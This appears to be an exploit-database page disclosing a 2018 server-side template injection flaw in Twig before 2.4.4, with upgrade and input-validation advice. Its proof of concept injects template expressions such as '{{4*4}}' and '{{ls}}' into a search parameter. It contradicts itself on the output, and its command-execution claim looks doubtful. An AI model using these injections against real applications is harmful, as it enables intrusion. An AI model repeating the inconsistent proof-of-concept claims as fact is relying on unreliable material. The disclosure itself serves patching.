Twig - exploit.company

vendor:

Twig

by:

JameelNabbo

7.5

CVSS

HIGH

Server side template injection

SSTI-94

CWE

Product Name: Twig

Affected Version From: Version < 2.4.4

Affected Version To:

Patch Exists: YES

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: MAC OSX

2018

Twig <2.4.4 Server side template injection

Twig <2.4.4 contains a server side template injection vulnerability which allows attackers to execute commands within the parameters. By injecting malicious code using the {{COMMAND TO EXECUTE}} syntax, instead of normal integer or string values, the attacker can execute arbitrary commands. The vulnerability depends on the application that takes different parameters via GET or POST.

Mitigation:

Update Twig to version 2.4.4 or later to patch the vulnerability. Additionally, input validation and sanitization should be implemented to prevent template injection attacks.

Source

Exploit-DB raw data:

Vulnerability details:
# Exploit Title: Twig <2.4.4 Server side template injection 
# Date: 02/15/2018
# Exploit Author: JameelNabbo
# Author website: www.jameelnabbo.com
# Vendor Homepage: https://twig.symfony.com 
# Software Link: https://twig.symfony.com/doc/2.x/intro.html#installation
# Version: < 2.4.4
# Tested on: MAC OSX

1.Description:
Twig is a modern php template engine  which compile templates down to plain optimized PHP code, Twig <2.4.4 contain SSTI vulnerability which allow attackers to execute commands within the Parameters, by just using {{COMAND TO EXECUTE}} instead of using the expected values “Normal integer or normal string", depends on the vulnerable application, which takes deferent params by GET or POST.

Example: by injecting this in a search param  http://localhost/search?search_key={{4*4}} <http://localhost/search?search_key=%7B%7B4*4%7D%7D>         Output: 16


2. POC:
http://localhost/search?search_key={{4*4}} 
OUTPUT: 4 

http://localhost/search?search_key={{ls}} 
OUTPUT: list of files/directories etc….